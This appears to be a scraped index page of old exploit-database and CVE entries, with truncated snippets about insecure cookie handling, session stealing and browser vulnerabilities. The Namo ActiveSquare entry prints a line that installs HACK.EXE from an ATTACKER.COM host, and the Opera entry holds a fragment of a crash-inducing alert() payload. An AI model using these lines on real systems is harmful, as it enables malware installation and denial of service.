Web Slider 0.6 - Insecure CookieAuthentication Handling

Web Slider 0.6 - Insecure CookieAuthentication Handling --==+================================================================================+==-- --==+ Web Slider = 0.6 Insecure Cookie/Authentication Handling +==--...

activekb-cookie.txt

--==+================================================================================+==-- --==+ ActiveKB = 1.5 Insecure Cookie Handling/Arbitrary Admin Access +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 1...

RantX 1.0 - Insecure Admin Authentication

--==+================================================================================+==-- --==+ RantX 1.0 Insecure Admin Authentication Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 14 MAY 200...

ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access

Exploit for unknown platform in category web applications =============================================================== ActiveKB = 1.5 Insecure Cookie Handling/Arbitrary Admin Access ===============================================================...

hostdir-cookie.txt

$ Script.......: HostDirectory Pro $ Download.....: http://www.mediafire.com/?71nvkj199n7 null Real Price :Price single license : $79.95 USD $ Author.......: CrackersChild | [email protected] $ Class........: Insecure Cookie Handling $ Demo.........:...

Host Directory PRO - Cookie Security Bypass

Host Directory PRO - Cookie Security Bypass source: https://www.securityfocus.com/bid/28863/info Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions. Exploiting this issue may allow an attacker to...

Host Directory PRO - Cookie Security Bypass

source: https://www.securityfocus.com/bid/28863/info Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions. Exploiting this issue may allow an attacker to bypass certain security restrictions and gai...

CcMail 1.0.1 - Insecure Cookie Handling

--==+================================================================================+==-- --==+ CcMail = 1.0.1 Insecure Cookie Handling +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: 11 April 2008 Script...

WebCT 4.x Javascript Session Stealer

WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x http://secunia.com/product/3280/ Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted again on: 20/07/2007 Date Published...

Sejoong Namo ActiveSquare 6 - &#039;NamoInstaller.dll&#039; install Method

Namo Web Editor NamoInstaller.dll install Method Exploit function Check obj.Install"http://ATTACKER.COM/HACK.EXE" Unable to create object tml -- milw0rm.com 2008-01-25...

SquirrelMail GPGP Encryption Plugin 2.02.1 - Access Validation Input Validation

SquirrelMail GPGP Encryption Plugin 2.02.1 - Access Validation Input Validation source: https://www.securityfocus.com/bid/26788/info The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability. Attackers can exploit these issue...

Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : firefox vulnerabilities (USN-535-1)

Various flaws were discovered in the layout and JavaScript engines. By tricking a user into opening a malicious web page, an attacker could execute arbitrary code with the user's privileges. CVE-2007-5336, CVE-2007-5339, CVE-2007-5340 Michal Zalewski discovered that the onUnload event handlers we...

Opera 9.10 - alert() Remote Denial of Service

Opera 9.10 - alert Remote Denial of Service \n" File.write"\n" Bof = 'A'44444 File.write"alert'"+Bof+"'\n" File.write"\n" File.write"" File.close --...

CVE-2006-5709

Unspecified vulnerability in WorldClient in Alt-N Technologies MDaemon before 9.50 has unknown impact and attack vectors related to a "JavaScript exploit."...

CVE-2006-5709

Unspecified vulnerability in WorldClient in Alt-N Technologies MDaemon before 9.50 has unknown impact and attack vectors related to a "JavaScript exploit."...

CVE-2006-5709

Technical details about CVE-2006-5709 are not publicly provided in the supplied documents. Monitor for updates; no affected products, exploit info, or remediation details are confirmed here.

MS Internet Explorer 7 Popup Address Bar Spoofing-vulnerability warning-the black bar safety net

IE 7 Exploits .. ! Program code program code !-- Secunia Advisory: SA22542 Release Date: 2006-10-25 Impact: Spoofing Solution Status: Unpatched Software: Microsoft Internet Explorer 7. x Description: A weakness has been discovered in Internet Explorer, which can be exploited by malicious people t...

CVE-2006-2787

EvalInSandbox in Mozilla Firefox and Thunderbird before 1.5.0.4 allows remote attackers to gain privileges via javascript that calls the valueOf method on objects that were created outside of the sandbox...

captivateXSS.txt

Captivate 1.0 Homepage: http://new-place.org/scripts/ Description: A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images. Effected files: gallery.php Inproper filtering of actio...

CVE-2006-1737

Integer overflow in Mozilla Firefox and Thunderbird 1.x before 1.5 and 1.0.x before 1.0.8, Mozilla Suite before 1.7.13, and SeaMonkey before 1.0 allows remote attackers to cause a denial of service crash and possibly execute arbitrary bytecode via JavaScript with a large regular expression...